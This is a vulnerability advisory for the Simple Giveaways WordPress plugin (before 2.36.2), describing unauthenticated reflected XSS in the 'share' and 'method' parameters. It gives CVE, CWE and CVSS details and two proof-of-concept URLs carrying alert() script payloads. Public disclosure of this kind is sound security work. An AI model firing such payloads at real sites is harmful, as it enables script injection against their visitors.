WordPress Plugin Vulnerabilities

Simple Giveaways < 2.36.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS

Proof of Concept

https://example.com/giveaway/mygiveaways/?share=%3Cscript%3Ealert(document.domain)%3C/script%3E
https://example.com/giveaway/mygiveaways/?method=%3Cscript%3Ealert(/XSS/)%3C/script%3E

Affects Plugins

Plugin icon
giveasap
Fixed in 2.36.2

References

CVE
CVE-2021-24298
URL
https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
30aebded-3eb3-4dda-90b5-12de5e622c91

Timeline

Publicly Published
2021-05-09 (about 3 years ago)
Added
2021-05-09 (about 3 years ago)
Last Updated
2021-05-09 (about 3 years ago)

Other

Published
Title
Published
2023-10-16
Title
WP Discord Invite < 2.5.2 - Admin+ Stored Cross Site Scripting
Published
2023-05-02
Title
Add to Feedly <= 1.2.11 - Admin+ Stored XSS
Published
2023-07-24
Title
Custom Field Template < 2.6 - Reflected Cross-Site Scripting
Published
2021-11-23
Title
IDPay for Contact Form 7 <= 2.1.2 - Reflected Cross-Site Scripting
Published
2019-06-26
Title
Limb Gallery < 1.4.0 - Reflected Cross-Site Scripting